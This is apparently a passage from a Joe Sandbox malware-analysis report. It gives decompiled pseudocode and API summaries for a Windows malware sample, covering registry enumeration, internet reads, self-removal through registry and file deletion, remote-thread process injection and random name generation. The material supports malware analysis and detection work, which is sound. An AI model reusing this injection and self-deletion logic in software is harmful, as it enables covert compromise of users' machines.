												_t134 =  &_v36;
												if(E00410818(_t128,  &_v36, _t142) != 0) {
													_v32 = _v32 + 1;
												}
											}
										}
									}
									goto L19;
								}
							}
							L19:
							_v8 = 0x104;
						} while (RegEnumKeyExW(_v12, _v20,  &_v812,  &_v8, 0, 0, 0, 0) == 0);
						_t138 = 0;
						goto L21;
						L22:
						_v16 = _v16 + 1;
					} while (_v16 < 2);
					E00410418(_v28);
					_t172 = _v32 - _t138;
					if(_v32 > _t138) {
						_t149 =  &_v92;
						_t97 = 0x60;
						E0040F369(_t97,  &_v92);
						E0040D929(_t149, _v36, 0x307, _t172, _t149);
					}
					return E00410418(_v36);
				}
			}



















































            0x00408bfc
            0x00408c15
            0x00408c1b
            0x00408c1d
            0x00408c1f
            0x00408c24
            0x00408e75
            0x00408c2a
            0x00408c32
            0x00408c33
            0x00408c3a
            0x00408c40
            0x00408c41
            0x00408c4c
            0x00408c53
            0x00408c5b
            0x00408c65
            0x00408c66
            0x00408c73
            0x00408c74
            0x00408c7e
            0x00408c7f
            0x00408c86
            0x00408c8c
            0x00408c8d
            0x00408c98
            0x00408c98
            0x00408c9e
            0x00408ca6
            0x00408ca9
            0x00408cac
            0x00408cb4
            0x00408ccf
            0x00000000
            0x00000000
            0x00408ce8
            0x00408ceb
            0x00408cfa
            0x00408e30
            0x00408e33
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00408d00
            0x00408d00
            0x00408d03
            0x00408d14
            0x00408d19
            0x00408d1c
            0x00408d21
            0x00408d2f
            0x00408d43
            0x00408d48
            0x00408d4d
            0x00408d61
            0x00408d66
            0x00408d6b
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00408d79
            0x00408d79
            0x00408d79
            0x00408d84
            0x00408d8c
            0x00408d97
            0x00408daf
            0x00408d99
            0x00408d9d
            0x00408da8
            0x00408da8
            0x00408db1
            0x00408db7
            0x00408dbd
            0x00408dc7
            0x00408dcb
            0x00408dce
            0x00408dcf
            0x00408dd4
            0x00408dd9
            0x00408dda
            0x00408ddd
            0x00408de6
            0x00408deb
            0x00408df0
            0x00408df3
            0x00408dfd
            0x00408dff
            0x00408dff
            0x00408dfd
            0x00408df0
            0x00408dc7
            0x00000000
            0x00408db7
            0x00408d4d
            0x00408e02
            0x00408e16
            0x00408e26
            0x00408e2e
            0x00000000
            0x00408e39
            0x00408e39
            0x00408e3c
            0x00408e49
            0x00408e4e
            0x00408e51
            0x00408e55
            0x00408e58
            0x00408e59
            0x00408e64
            0x00408e64
            0x00000000
            0x00408e6c

            APIs
            • HeapAlloc.KERNEL32(00000008,00000C0C,?,?,00000001), ref: 00408C15
            • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,00000003,?,00000000,00000008,?,?,00000001), ref: 00408CC7
            • RegEnumKeyExW.ADVAPI32 ref: 00408CF2
            • RegCloseKey.ADVAPI32(00000003,?,?,00000001), ref: 00408E33
              • Part of subcall function 004143B6: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,?,0040F571,?,00000017,.exe,00000000,00000000), ref: 004143C9
            • RegOpenKeyExW.ADVAPI32(00000003,?,00000000,00000001,?,?,?,?,?,?,?,?,?,00000001), ref: 00408D8F
            • RegEnumKeyExW.ADVAPI32 ref: 00408E20
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Open$Enum$AllocCloseHeap
            • String ID:
            • API String ID: 3287537325-0
            • Opcode ID: 059b96b5ef44858d8de0c1c5b99e699ab93831f2d3e54953b34ccb58eba07c88
            • Instruction ID: 9762fbf456c7bca11fcb55ef95ac10350905a677f22067ae0a671d08f93af3bc
            • Opcode Fuzzy Hash: 059b96b5ef44858d8de0c1c5b99e699ab93831f2d3e54953b34ccb58eba07c88
            • Instruction Fuzzy Hash: 69715E71D00218ABDF11DBA5CD45ADFBBB8EB48714F10447AEA04F3291DB789A858BA4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040C545 Relevance: 9.2, APIs: 6, Instructions: 155COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0040C545(void* __eflags, char* _a4, intOrPtr _a8, signed int _a12, signed int* _a16) {
				char _v5;
				char _v12;
				signed int _v16;
				char _v20;
				char _v24;
				long _v28;
				void* __edi;
				void* __esi;
				signed int _t55;
				void* _t58;
				signed int* _t59;
				intOrPtr _t60;
				signed int _t61;
				signed int* _t62;
				signed int _t71;
				char* _t84;
				short* _t91;
				void* _t96;
				intOrPtr _t98;
				intOrPtr* _t100;
				signed int _t104;
				struct _GOPHER_FIND_DATAA _t108;

				_v16 = _v16 | 0xffffffff;
				EnterCriticalSection(0x41aa60);
				_t100 = _a4;
				_t55 = E0040BDA6( *_t100);
				if(_t55 == 0xffffffff) {
					L35:
					LeaveCriticalSection(0x41aa60);
					return _v16;
				}
				_t98 =  *0x41aa78; // 0x0
				_t58 = _t55 * 0x24 + _t98;
				if( *((intOrPtr*)(_t58 + 0x10)) <= 0) {
					goto L35;
				}
				_t96 = _t58;
				if( *((intOrPtr*)(_t96 + 0x10)) != 1 || ( *( *(_t96 + 0xc)) & 0x00000003) == 0) {
					_t59 = _a16;
					if(_t59 != 0) {
						 *_t59 =  *_t59 & 0x00000000;
					}
					if( *((intOrPtr*)(_t96 + 0x18)) != 0xffffffff) {
						L22:
						_t60 =  *((intOrPtr*)(_t96 + 0x18));
						if(_t60 != 0xffffffff && _v16 == 0xffffffff) {
							_t61 = _t60 -  *((intOrPtr*)(_t96 + 0x1c));
							_t104 = _t61;
							if(_t61 != 0) {
								if(_a8 == 0) {
									_a12 = E0041185E(0x2000, 0x1000);
								}
								if(_a12 < _t104) {
									_t104 = _a12;
								}
								if(_a8 != 0) {
									E00410454(_a8,  *((intOrPtr*)(_t96 + 0x14)) +  *((intOrPtr*)(_t96 + 0x1c)), _t104);
									 *((intOrPtr*)(_t96 + 0x1c)) =  *((intOrPtr*)(_t96 + 0x1c)) + _t104;
								}
							}
							_t62 = _a16;
							if(_t62 != 0) {
								 *_t62 = _t104;
							}
							_v16 = 1;
						}
						goto L34;
					}
					LeaveCriticalSection(0x41aa60);
					_v5 = E0040C423( &_v20,  *_t100,  *((intOrPtr*)(_t96 + 4)),  &_v12);
					EnterCriticalSection(0x41aa60);
					if(_v5 == 0) {
						L21:
						_v16 = _v16 & 0x00000000;
						SetLastError(0x2ee4);
						goto L22;
					}
					_t106 =  *_a4;
					_t71 = E0040BDA6( *_a4);
					if(_t71 == 0xffffffff) {
						E00410418(_v12);
						goto L21;
					}
					_t96 = _t71 * 0x24 +  *0x41aa78;
					_t102 = E004123BD( &_v24, _t106);
					if(E004072B2( *((intOrPtr*)(_t96 + 0x10)),  *(_t96 + 0xc), _t75,  &_v12,  &_v20) != 0) {
						_t84 = E0041065D(_v24, 0, _t102);
						_a4 = _t84;
						if(_t84 != 0) {
							_v28 = 0x1000;
							_t108 = E004103ED(0x1000);
							if(_t108 != 0) {
								 *_t108 = 0x50;
								if(GetUrlCacheEntryInfoW(_a4, _t108,  &_v28) != 0) {
									_t91 =  *((intOrPtr*)(_t108 + 8));
									if(_t91 != 0 &&  *_t91 != 0) {
										E004156EB(_t91, _v12, _v20);
									}
								}
								E00410418(_t108);
							}
							E00410418(_a4);
						}
					}
					E00410418(_t102);
					 *((intOrPtr*)(_t96 + 0x14)) = _v12;
					 *((intOrPtr*)(_t96 + 0x18)) = _v20;
					goto L22;
				} else {
					 *_t100 =  *((intOrPtr*)(_t96 + 0x20));
					L34:
					goto L35;
				}
			}

























            0x0040c54b
            0x0040c556
            0x0040c55c
            0x0040c561
            0x0040c569
            0x0040c717
            0x0040c71c
            0x0040c728
            0x0040c728
            0x0040c56f
            0x0040c578
            0x0040c57e
            0x00000000
            0x00000000
            0x0040c585
            0x0040c58b
            0x0040c59f
            0x0040c5a4
            0x0040c5a6
            0x0040c5a6
            0x0040c5ad
            0x0040c6b8
            0x0040c6b8
            0x0040c6be
            0x0040c6c6
            0x0040c6c9
            0x0040c6cb
            0x0040c6d1
            0x0040c6e2
            0x0040c6e2
            0x0040c6e8
            0x0040c6ea
            0x0040c6ea
            0x0040c6f1
            0x0040c6fe
            0x0040c703
            0x0040c703
            0x0040c6f1
            0x0040c706
            0x0040c70b
            0x0040c70d
            0x0040c70d
            0x0040c70f
            0x0040c70f
            0x00000000
            0x0040c6be
            0x0040c5bb
            0x0040c5d5
            0x0040c5d8
            0x0040c5e2
            0x0040c6a9
            0x0040c6a9
            0x0040c6b2
            0x00000000
            0x0040c6b2
            0x0040c5eb
            0x0040c5ed
            0x0040c5f5
            0x0040c6a4
            0x00000000
            0x0040c6a4
            0x0040c608
            0x0040c612
            0x0040c627
            0x0040c62f
            0x0040c634
            0x0040c639
            0x0040c640
            0x0040c648
            0x0040c64c
            0x0040c656
            0x0040c664
            0x0040c666
            0x0040c66b
            0x0040c67a
            0x0040c67a
            0x0040c66b
            0x0040c680
            0x0040c680
            0x0040c688
            0x0040c688
            0x0040c639
            0x0040c68e
            0x0040c696
            0x0040c69c
            0x00000000
            0x0040c595
            0x0040c598
            0x0040c716
            0x00000000
            0x0040c716

            APIs
            • EnterCriticalSection.KERNEL32(0041AA60), ref: 0040C556
            • LeaveCriticalSection.KERNEL32(0041AA60), ref: 0040C5BB
            • EnterCriticalSection.KERNEL32(0041AA60), ref: 0040C5D8
            • GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 0040C65C
            • SetLastError.KERNEL32(00002EE4), ref: 0040C6B2
            • LeaveCriticalSection.KERNEL32(0041AA60), ref: 0040C71C
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalSection$EnterLeave$CacheEntryErrorInfoLast
            • String ID:
            • API String ID: 3653105453-0
            • Opcode ID: 31b576822a17ba58cefcf064c13028beecb23524f36e3e058db64614a3383146
            • Instruction ID: 449e02f05eb19b1f70c25671eff6cca34a9ed6d16babb17d36dbc8411e6a768b
            • Opcode Fuzzy Hash: 31b576822a17ba58cefcf064c13028beecb23524f36e3e058db64614a3383146
            • Instruction Fuzzy Hash: D7518131900209EBDB21DFA5C884B9E77B4EF05364F14466AF814BB2D1D778D990CFA9
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040C423 Relevance: 9.1, APIs: 6, Instructions: 96networkmemoryCOMMON
            Download Yara Rule
            C-Code - Quality: 68%
            			E0040C423(intOrPtr* __edi, intOrPtr _a4, void* _a8, intOrPtr* _a12) {
				intOrPtr _v28;
				signed int _v44;
				void* _v52;
				intOrPtr _v56;
				char _v61;
				intOrPtr _v64;
				signed int _v72;
				intOrPtr _v76;
				char _v77;
				intOrPtr _v84;
				intOrPtr _v85;
				char _v89;
				void* __esi;
				void* _t30;
				intOrPtr _t31;
				void** _t36;
				intOrPtr _t43;
				intOrPtr* _t57;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr _t64;

				_t62 = __edi;
				ResetEvent(_a8);
				_t30 = HeapAlloc( *0x41bc68, 8, 0x1004);
				_t64 = 0;
				_v52 = _t30;
				if(_t30 != 0) {
					_t57 = __imp__InternetSetStatusCallbackW;
					_t31 =  *_t57(_a4, E0040C3DA);
					_t61 = 0x28;
					_v56 = _t31;
					 *_a12 = 0;
					 *__edi = 0;
					_v61 = 1;
					E004104CB( &_v52,  &_v52, 0, _t61);
					_v64 = _t61;
					_v44 = _v72;
					while(1) {
						L3:
						_t36 =  &_v52;
						_v28 = 0x1000;
						__imp__InternetReadFileExA(_a4, _t36, 8, _t64);
						if(_t36 == 0) {
							break;
						}
						if(_v44 != _t64) {
							_t66 = _a12;
							if(E004103A8( *_t62 + _v44, _a12) == 0) {
								L9:
								_v77 = 0;
							} else {
								E00410454( *_t66 +  *_t62, _v76, _v44);
								 *_t62 =  *_t62 + _v56;
								_t64 = 0;
								continue;
							}
						}
						L10:
						asm("sbb eax, eax");
						 *_t57(_a4,  ~(_v72 + 1) & _v72);
						E00410418(_v84);
						if(_v89 == 0) {
							E00410418( *_a12);
						}
						_t43 = _v85;
						goto L13;
					}
					if(GetLastError() != 0x3e5) {
						goto L9;
					} else {
						E004139F3( &_a8);
						goto L3;
					}
					goto L10;
				} else {
					E00410418(0);
					_t43 = 0;
				}
				L13:
				return _t43;
			}
























            0x0040c423
            0x0040c431
            0x0040c444
            0x0040c44a
            0x0040c44c
            0x0040c452
            0x0040c461
            0x0040c46f
            0x0040c473
            0x0040c474
            0x0040c47c
            0x0040c484
            0x0040c486
            0x0040c48b
            0x0040c494
            0x0040c498
            0x0040c49c
            0x0040c49c
            0x0040c49f
            0x0040c4a7
            0x0040c4af
            0x0040c4b7
            0x00000000
            0x00000000
            0x0040c4d5
            0x0040c4dd
            0x0040c4e7
            0x0040c507
            0x0040c507
            0x0040c4e9
            0x0040c4f8
            0x0040c501
            0x0040c503
            0x00000000
            0x0040c503
            0x0040c4e7
            0x0040c50c
            0x0040c513
            0x0040c51d
            0x0040c523
            0x0040c52d
            0x0040c534
            0x0040c534
            0x0040c539
            0x00000000
            0x0040c539
            0x0040c4c4
            0x00000000
            0x0040c4c6
            0x0040c4ca
            0x00000000
            0x0040c4ca
            0x00000000
            0x0040c454
            0x0040c455
            0x0040c45a
            0x0040c45a
            0x0040c53d
            0x0040c542

            APIs
            • ResetEvent.KERNEL32(?), ref: 0040C431
            • HeapAlloc.KERNEL32(00000008,00001004), ref: 0040C444
            • InternetSetStatusCallbackW.WININET(?,0040C3DA), ref: 0040C46F
            • InternetReadFileExA.WININET ref: 0040C4AF
            • GetLastError.KERNEL32 ref: 0040C4B9
            • InternetSetStatusCallbackW.WININET(?,?), ref: 0040C51D
              • Part of subcall function 00410418: HeapFree.KERNEL32(00000000,00000000,00411C0D,00000000,?,?,?,?,0040373A,00000000,00403AF4), ref: 0041042B
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Internet$CallbackHeapStatus$AllocErrorEventFileFreeLastReadReset
            • String ID:
            • API String ID: 3721613131-0
            • Opcode ID: bc5be74c2d3f0849fea5ea65deb86554f169fcf8a3e246ba13cca90e3934a72f
            • Instruction ID: 51218edfded8628c0f13d9cfe365777ade482511a04aaaec4305afa1e3e0c7c1
            • Opcode Fuzzy Hash: bc5be74c2d3f0849fea5ea65deb86554f169fcf8a3e246ba13cca90e3934a72f
            • Instruction Fuzzy Hash: 87317A71104355EBDB01DF64DC81AAEBBE8FF48704F00492AF984E72A0D774D994DB9A
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405A73 Relevance: 9.1, APIs: 6, Instructions: 77COMMON
            Download Yara Rule
            C-Code - Quality: 79%
            			E00405A73(void* __ebx, void* __ecx, void* __eflags) {
				char _v1168;
				char _v1668;
				char _v1680;
				short _v1688;
				char _v2192;
				short _v2208;
				char _v2720;
				char _v2728;
				char _v2992;
				char _v3072;
				void* __edi;
				void* __esi;
				WCHAR* _t50;
				WCHAR* _t51;
				WCHAR* _t52;
				void* _t65;

				_t65 = __eflags;
				_t46 = __ecx;
				_t50 =  &_v1668;
				E00403ED1(__ecx, _t50, 1);
				PathRemoveFileSpecW(_t50);
				_t51 =  &_v2192;
				E00403ED1(_t46, _t51, 2);
				PathRemoveFileSpecW(_t51);
				 *0x41a290 =  *0x41a290 | 0x00000002;
				_push(0);
				E00405009();
				E004048ED(_t46, _t65);
				E00415B2D( &_v1680, _t65);
				E00415B2D(_t51, _t65);
				_t52 =  &_v2720;
				E00403ED1(_t51, _t52, 3);
				SHDeleteKeyW(0x80000001, _t52);
				CharToOemW( &_v1688,  &_v2728);
				CharToOemW( &_v2208,  &_v2992);
				_t53 =  &_v3072;
				E0040F333(0xa8,  &_v3072);
				_push( &_v2992);
				_push( &_v2728);
				_push( &_v2992);
				_push( &_v2728);
				if(E004111E9( &_v3072, 0x474,  &_v1168, _t53) > 0) {
					E00414AF8(__ebx, 0x474,  &_v1168);
				}
				if( *0x41a75c == 0xffffffff) {
					ExitProcess(0);
				}
				return 1;
			}



















            0x00405a73
            0x00405a73
            0x00405a83
            0x00405a8a
            0x00405a98
            0x00405a9c
            0x00405aa3
            0x00405aab
            0x00405aad
            0x00405ab4
            0x00405ab6
            0x00405abb
            0x00405ac7
            0x00405ace
            0x00405ad5
            0x00405adc
            0x00405ae9
            0x00405b05
            0x00405b14
            0x00405b16
            0x00405b1f
            0x00405b28
            0x00405b30
            0x00405b35
            0x00405b3d
            0x00405b57
            0x00405b5c
            0x00405b5c
            0x00405b68
            0x00405b6c
            0x00405b6c
            0x00405b79

            APIs
              • Part of subcall function 00403ED1: PathRenameExtensionW.SHLWAPI(?,.dat,?,0041A2F0,00000000,00000032,?,774B9EB0,00000000), ref: 00403F4A
            • PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 00405A98
            • PathRemoveFileSpecW.SHLWAPI(?,00000002), ref: 00405AAB
              • Part of subcall function 00405009: SetEvent.KERNEL32(00405ABB,00000000), ref: 0040500F
              • Part of subcall function 00405009: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00405022
              • Part of subcall function 004048ED: SHDeleteValueW.SHLWAPI(80000001,?,?,FF220823,?,00000000), ref: 0040492C
              • Part of subcall function 004048ED: Sleep.KERNEL32(000001F4), ref: 0040493B
              • Part of subcall function 004048ED: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 00404951
              • Part of subcall function 00415B2D: FindFirstFileW.KERNEL32(?,?,?,?), ref: 00415B5E
              • Part of subcall function 00415B2D: FindNextFileW.KERNEL32(00000000,?), ref: 00415BB9
              • Part of subcall function 00415B2D: FindClose.KERNEL32(00000000), ref: 00415BC4
              • Part of subcall function 00415B2D: SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 00415BD0
              • Part of subcall function 00415B2D: RemoveDirectoryW.KERNEL32(?), ref: 00415BD7
            • SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 00405AE9
            • CharToOemW.USER32 ref: 00405B05
            • CharToOemW.USER32 ref: 00405B14
            • ExitProcess.KERNEL32 ref: 00405B6C
              • Part of subcall function 00414AF8: CharToOemW.USER32 ref: 00414B28
              • Part of subcall function 00414AF8: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00414BAC
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: File$CharFindPathRemove$DeleteSpec$AttributesCloseDirectoryEnvironmentEventExitExtensionFirstNextObjectOpenProcessRenameSingleSleepValueVariableWait
            • String ID:
            • API String ID: 1572960351-0
            • Opcode ID: 667e52e821f6ade57f5350bf338662d76f76dc4f1b2334bf992ec4b5f87f0ac7
            • Instruction ID: bdf439bfd47097f2aefded403e01c0f9100f040fec6a77e3ddc6b90bc8dc270a
            • Opcode Fuzzy Hash: 667e52e821f6ade57f5350bf338662d76f76dc4f1b2334bf992ec4b5f87f0ac7
            • Instruction Fuzzy Hash: D02144726083485BC220A7A5DC06FDB779CEBC4315F004A3BB559E7191DB74B605CBA6
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00415750 Relevance: 9.1, APIs: 6, Instructions: 68filememoryCOMMON
            Download Yara Rule
            C-Code - Quality: 74%
            			E00415750(signed int __eax, void* __ecx, void** __esi, long _a4) {
				intOrPtr _v8;
				long _v12;
				void* _t19;
				void* _t20;
				long _t22;
				void* _t23;

				_t33 = __esi;
				asm("sbb eax, eax");
				_t19 = CreateFileW(_a4, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
				__esi[2] = _t19;
				if(_t19 == 0xffffffff) {
					L11:
					_t20 = 0;
				} else {
					__imp__GetFileSizeEx(_t19,  &_v12);
					if(_t19 == 0 || _v8 != 0) {
						L10:
						CloseHandle(_t33[2]);
						goto L11;
					} else {
						_t22 = _v12;
						__esi[1] = _t22;
						if(_t22 != 0) {
							_t23 = VirtualAlloc(0, _t22, 0x3000, 4);
							 *__esi = _t23;
							if(_t23 == 0) {
								goto L10;
							} else {
								if(ReadFile(__esi[2], _t23, __esi[1],  &_a4, 0) == 0 || _a4 != __esi[1]) {
									VirtualFree( *_t33, 0, 0x8000);
									goto L10;
								} else {
									goto L5;
								}
							}
						} else {
							 *__esi = 0;
							L5:
							_t20 = 1;
						}
					}
				}
				return _t20;
			}









            0x00415750
            0x00415763
            0x00415775
            0x0041577b
            0x00415781
            0x004157f1
            0x004157f1
            0x00415783
            0x00415788
            0x00415790
            0x004157e8
            0x004157eb
            0x00000000
            0x00415797
            0x00415797
            0x0041579a
            0x0041579f
            0x004157b0
            0x004157b6
            0x004157ba
            0x00000000
            0x004157bc
            0x004157d0
            0x004157e2
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004157d0
            0x004157a1
            0x004157a1
            0x004157a3
            0x004157a3
            0x004157a3
            0x0041579f
            0x00415790
            0x004157f5

            APIs
            • CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,004043B8,?,?,00000000), ref: 00415775
            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,004043B8,?,?,00000000), ref: 00415788
            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,004043B8,?,?,00000000), ref: 004157B0
            • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,004043B8,?,?,00000000), ref: 004157C8
            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,004043B8,?,?,00000000), ref: 004157E2
            • CloseHandle.KERNEL32(?,?,?,?,?,004043B8,?,?,00000000), ref: 004157EB
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
            • String ID:
            • API String ID: 1974014688-0
            • Opcode ID: ee597b01b564d360fb9ed8a38f813798c6c22935557b3bb386b8af7ad68ce328
            • Instruction ID: 0d1357fd9c704406456672e850e71acf68a2448e1a94e8e13560d536ac837753
            • Opcode Fuzzy Hash: ee597b01b564d360fb9ed8a38f813798c6c22935557b3bb386b8af7ad68ce328
            • Instruction Fuzzy Hash: 97119375100600FFDB248F61CC4AEEB7BE8EB85700F10452EF5A6E51A0D774A981CB28
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00404C7D Relevance: 9.1, APIs: 6, Instructions: 54synchronizationthreadinjectionCOMMON
            Download Yara Rule
            C-Code - Quality: 86%
            			E00404C7D(void* __ecx, long _a4, intOrPtr _a8) {
				char _v5;
				void* __edi;
				void* __esi;
				void* _t10;
				void* _t14;
				void* _t23;
				void* _t25;
				void* _t26;

				_t21 = __ecx;
				_push(__ecx);
				_v5 = 0;
				_t23 = OpenProcess(0x47a, 0, _a4);
				_t28 = _t23;
				if(_t23 != 0) {
					_push(_t25);
					_t10 = E00403D3B(_t21, _t23, _t25, _t28, _a8, 0);
					_t26 = _t10;
					if(_t26 != 0) {
						_t14 = CreateRemoteThread(_t23, 0, 0, _t10 -  *0x41a2a4 + E00404388, 0, 0, 0);
						_a4 = _t14;
						if(_t14 == 0) {
							VirtualFreeEx(_t23, _t26, 0, 0x8000);
						} else {
							WaitForSingleObject(_t14, 0x2710);
							CloseHandle(_a4);
							_v5 = 1;
						}
					}
					CloseHandle(_t23);
				}
				return _v5;
			}











            0x00404c7d
            0x00404c80
            0x00404c8e
            0x00404c97
            0x00404c99
            0x00404c9b
            0x00404c9d
            0x00404ca2
            0x00404ca7
            0x00404cab
            0x00404cbf
            0x00404cc5
            0x00404cca
            0x00404cef
            0x00404ccc
            0x00404cd2
            0x00404cdb
            0x00404ce1
            0x00404ce1
            0x00404cca
            0x00404cf6
            0x00404cfc
            0x00404d03

            APIs
            • OpenProcess.KERNEL32(0000047A,00000000,?,00000000,7620F560,?,?,00404E33,?,?,00000000,?,?,00000000), ref: 00404C91
            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-0081E62C,00000000,00000000,00000000), ref: 00404CBF
            • WaitForSingleObject.KERNEL32(00000000,00002710,?,00404E33,?,?,00000000,?,?,00000000), ref: 00404CD2
            • CloseHandle.KERNEL32(?,?,00404E33,?,?,00000000,?,?,00000000), ref: 00404CDB
            • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,00404E33,?,?,00000000,?,?,00000000), ref: 00404CEF
            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00404E33,?,?,00000000,?,?,00000000), ref: 00404CF6
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
            • String ID:
            • API String ID: 14861764-0
            • Opcode ID: 6e09c2a8d2113ed3128d9d208b262baed39e57be5c534c9894ced9e3061a944f
            • Instruction ID: f27d6e2c6b3d4ec6edb13dee8cda7b7768f6462915a5855c365f17cb714c63cb
            • Opcode Fuzzy Hash: 6e09c2a8d2113ed3128d9d208b262baed39e57be5c534c9894ced9e3061a944f
            • Instruction Fuzzy Hash: 7C0175B2104148BFE7012BA49DCCDBF3EACDB89395B054079FB02B6161C6794D459679
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0041471A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 105COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0041471A(signed int __eax, signed int __ecx, void* __eflags, signed int _a4, signed short* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char* _v28;
				char* _v32;
				signed int _t56;
				WCHAR* _t57;
				short* _t59;
				signed short _t72;
				char* _t78;
				signed int _t85;
				signed short* _t86;
				signed int _t88;
				intOrPtr _t89;
				void* _t90;

				_t88 = E0041185E(__eax & 0x000000ff, __ecx & 0x000000ff);
				_v16 = _t88;
				_t56 = E00411812();
				_t78 = "bcdfghklmnpqrstvwxz";
				if((_t56 & 0x00000100) == 0) {
					_v32 = "aeiouy";
					_v28 = _t78;
				} else {
					_v32 = _t78;
					_v28 = "aeiouy";
				}
				_t85 = 0;
				_v12 = 0;
				_v8 = 0;
				if(_t88 > 0) {
					_v20 = _a4 & 0x00000004;
					do {
						if(_v8 == 2) {
							if((E00411812() & 0x00000100) == 0) {
								_v32 = "aeiouy";
								_v28 = _t78;
							} else {
								_v32 = _t78;
								_v28 = "aeiouy";
							}
							_v8 = _v8 & 0x00000000;
						}
						_t89 =  *((intOrPtr*)(_t90 + _v8 * 4 - 0x1c));
						_v24 = ((0 | _t89 != _t78) - 0x00000001 & 0x0000000d) + 6;
						if(_v20 == 0 || _t85 - _v12 <= 1 || (E00411812() & 0x00000101) != 0x101) {
							_t72 =  *((char*)(E0041185E(_v24 - 1, 0) + _t89));
						} else {
							_t72 = 0x20;
							_v12 = _t85;
						}
						_a8[_t85] = _t72;
						_t85 = _t85 + 1;
						_v8 = _v8 + 1;
					} while (_t85 < _v16);
					_t88 = _v16;
				}
				if((_a4 & 0x00000004) == 0 || _t88 <= 0) {
					_t86 = _a8;
				} else {
					_t86 = _a8;
					_t59 = _t86 + _t88 * 2 - 2;
					while( *_t59 == 0x20) {
						_t88 = _t88 - 1;
						_t59 = _t59;
						if(_t88 > 0) {
							continue;
						} else {
						}
						goto L24;
					}
				}
				L24:
				_t57 = 0;
				_t86[_t88] = 0;
				if((_a4 & 0x00000002) != 0) {
					_t57 = CharUpperW( *_t86 & 0x0000ffff);
					 *_t86 = 0;
				}
				return _t57;
			}




















            0x0041472f
            0x00414731
            0x00414734
            0x00414739
            0x00414743
            0x00414751
            0x00414758
            0x00414745
            0x00414745
            0x00414748
            0x00414748
            0x0041475b
            0x0041475d
            0x00414760
            0x00414765
            0x00414771
            0x00414774
            0x00414778
            0x00414784
            0x00414792
            0x00414799
            0x00414786
            0x00414786
            0x00414789
            0x00414789
            0x0041479c
            0x0041479c
            0x004147a3
            0x004147b9
            0x004147bc
            0x004147ed
            0x004147da
            0x004147dc
            0x004147dd
            0x004147dd
            0x004147f5
            0x004147f9
            0x004147fa
            0x004147fd
            0x00414806
